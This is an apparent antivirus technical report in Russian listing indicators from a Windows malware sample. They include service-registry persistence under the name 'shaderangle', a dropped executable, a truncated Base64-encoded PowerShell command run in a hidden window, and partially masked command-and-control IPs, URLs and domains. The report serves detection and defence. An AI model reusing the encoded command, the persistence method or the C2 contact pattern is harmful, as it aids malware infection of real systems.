Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\shaderangle] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\shaderangle] 'ImagePath' = '"%WINDIR%\SysWOW64\shaderangle.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAAQwBnAHkAcgBuAG0AaQB2ACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEgAcwBuAG4AbgBtAHcAaQAgACMAPgAgACQATAByAGQAZAByAHUAcQB4AGcAZwB6AD0AJwBLAGUAYwBsAGYAdgBk...
- %HOMEPATH%\396.exe
- %HOMEPATH%\396.exe в %WINDIR%\syswow64\shaderangle.exe
- '18#.#31.163.89':7080
- '85.##4.121.33':8443
- http://sa####iaschool.in/cgi-bin/y945hsn2u7-pdt9-5230/
- http://85.###.121.33:8443/psec/sess/ringin/merge/
- DNS ASK s-####rov-mektep.kz
- DNS ASK vi####mfumar.club
- DNS ASK sa####iaschool.in
- '%HOMEPATH%\396.exe'
- '%WINDIR%\syswow64\shaderangle.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAAQwBnAHkAcgBuAG0AaQB2ACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEgAcwBuAG4AbgBtAHcAaQAgACMAPgAgACQATAByAGQAZAByAHUAcQB4AGcAZwB6AD0AJwBLAGUAYwBsAGYAdgBk...' (со скрытым окном)